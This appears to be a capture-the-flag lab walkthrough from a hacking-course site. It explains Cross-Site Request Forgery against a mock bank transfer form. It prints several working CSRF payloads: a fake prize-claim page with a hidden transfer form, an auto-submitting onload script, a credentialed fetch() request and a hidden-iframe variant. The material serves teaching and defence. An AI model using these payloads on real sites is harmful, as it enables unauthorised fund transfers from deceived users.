Step 1: Click on the green button to Start the Lab
Step 2: Hack the URL or IP of the lab
Step 3: Use your skills and logic to find the flags!
Cross-Site Request Forgery (CSRF) exploits the trust a website has in a user's browser. When a user is authenticated to a web application, their browser automatically includes authentication cookies with every request to that domain. CSRF attacks leverage this behavior by tricking users into making requests they didn't intend to make.
<target-ip>
to access SecureBankForm Analysis:
<form method="POST" action="/transfer">
<input type="hidden" name="csrf_token" value="[SESSION-TOKEN]">
<input name="recipient_account" type="text">
<input name="amount" type="number">
<input name="description" type="text">
</form>
Create a malicious HTML page that will perform an unauthorized transfer when visited by an authenticated user. The key is to send the request without the valid CSRF token:
<!DOCTYPE html>
<html>
<head>
<title>Win $1000 - Claim Now!</title>
</head>
<body>
<h1>🎉 Congratulations! You've won $1000! 🎉</h1>
<p>Click the button below to claim your prize instantly!</p>
<!-- CSRF attack form - NO CSRF TOKEN -->
<form id="csrf-form" method="POST" action="http://<target-ip>/transfer" style="display:none;">
<input name="recipient_account" value="ACC002" type="hidden">
<input name="amount" value="500" type="hidden">
<input name="description" value="Prize money transfer" type="hidden">
<!-- NO csrf_token field = CSRF attack! -->
</form>
<button onclick="document.getElementById('csrf-form').submit(); alert('Prize claimed! Check your account.')" style="background: #28a745; color: white; padding: 15px 30px; border: none; border-radius: 5px; font-size: 18px; cursor: pointer;">
💰 Claim Your $1000 Prize Now! 💰
</button>
</body>
</html>
The application detects CSRF attacks by checking for valid CSRF tokens:
# Server-side CSRF detection logic:
submitted_token = request.form.get('csrf_token', '')
if not validate_csrf_token(submitted_token):
csrf_detected = True # Flag will appear on all pages
print("🚨 CSRF ATTACK DETECTED! Request without valid CSRF token")
<script>
// Automatically submit the form when page loads
window.onload = function() {
document.getElementById('csrf-form').submit();
};
</script>
<script>
fetch('http://<target-ip>/transfer', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: 'recipient_account=ACC002&amount=500&description=CSRF Attack',
credentials: 'include' // Include session cookies
});
</script>
<iframe src="about:blank" name="csrf-frame" style="display:none;"></iframe>
<form method="POST" action="http://<target-ip>/transfer" target="csrf-frame">
<input name="recipient_account" value="ACC002" type="hidden">
<input name="amount" value="500" type="hidden">
<input name="description" value="Hidden transfer" type="hidden">
</form>
<script>document.forms[0].submit();</script>
This CSRF challenge demonstrates how Cross-Site Request Forgery attacks work even when CSRF tokens are present but not properly enforced. By crafting external forms that exclude CSRF tokens, attackers can perform unauthorized actions on behalf of authenticated users. The challenge shows both the attack technique and the importance of proper CSRF protection implementation. Understanding these vulnerabilities is crucial for developing secure web applications that properly validate user intent and protect against malicious requests.
Sign-in to your account to access your hacking courses and cyber security labs.
Access all hacking courses and cyber security labs.